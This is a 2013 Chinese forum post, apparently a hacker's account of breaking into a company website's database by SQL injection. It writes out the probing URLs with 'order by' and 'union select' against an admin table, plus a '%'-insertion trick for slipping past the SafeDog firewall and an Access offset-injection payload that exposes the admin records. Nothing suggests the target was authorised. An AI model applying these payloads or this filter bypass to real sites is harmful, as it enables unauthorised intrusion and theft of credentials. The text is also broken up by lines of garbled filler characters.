打开网站,一个企业站。
4 D/ v* ]$ h) n; [$ r( m9 p2 y6 B" B3 y0 ^, a9 r. Y
0 ]1 q( {' K, d! ^顺手加个admin
T# i( a( D* a% `
( [% v* u8 D6 e
/ u1 G7 A+ K) X" v7 r6 b% E默认后台。
$ s5 s$ M" a X' L4 O2 v回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
~) f& ]5 l. E" H, {1 Q; Q$ O6 w: W# h- h4 N% D. k: l
- @" ?( Z2 [5 H1 k1 L
8 H8 G _* C% u6 O+ Y( \8 i/ D所以就不用御剑扫了,待会直接封IP。
6 [8 n2 d, L+ u
# m0 Y( \7 ~+ }2 W1 a; U用order by语句判断是否存在注入。# N% T* @( D# f' V
http://www.xxx.com /product_show.asp?id=997 order by 1
/ z: h p# X1 ^# o" x, z! rhttp://www.xxx.com /product_show.asp?id=997 order by 1006 U" B" R5 J, l' ~
现在存在注入,经测试后发现是9个字段。
; p$ }5 c& w( S! C, F' G( E # c2 ?& I6 y. x% e6 Q3 T
接下来进行联合查询,猜是否存在admin表。) |0 ]7 d, r; u( j( ~
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
3 g) N6 A" ~3 w ?5 N# a- K: ?. ] U2 }" ^, @0 t8 d
( g3 `! M' h* P5 ]1 F6 T5 r8 h0 O: c/ @# p3 E) o
在select中间加个%,se%lect绕过安全狗。
* v6 p5 z) ~; ^, h
$ s- V x0 T0 @+ R5 ]
" h' r8 M) c7 H; f/ C5 T发现存在admin表,然后开始手工猜常用的字段。7 r1 }, j: v* v8 _, a4 `
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。. q) M7 P" z2 D0 V
/ [0 T/ c! H+ k9 q8 Q
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。: C4 t0 d0 v9 o
' n% J) ~2 N' r- z9 F科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
2 [, S* M" B, Hhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
7 b- o/ A& [) @3 T好了,敏感内容出显了。2 S% M, g6 t" N: G. l6 p
, ` Z# T' ~( }; d' g4 H1 j9 R
' t" [( d* S! e4 V' x2 u1 Q0 b6 R
1 Q7 L& g. C* o2 G- l6 F |
发表于 2013-3-8 21:49:45
收藏
支持
反对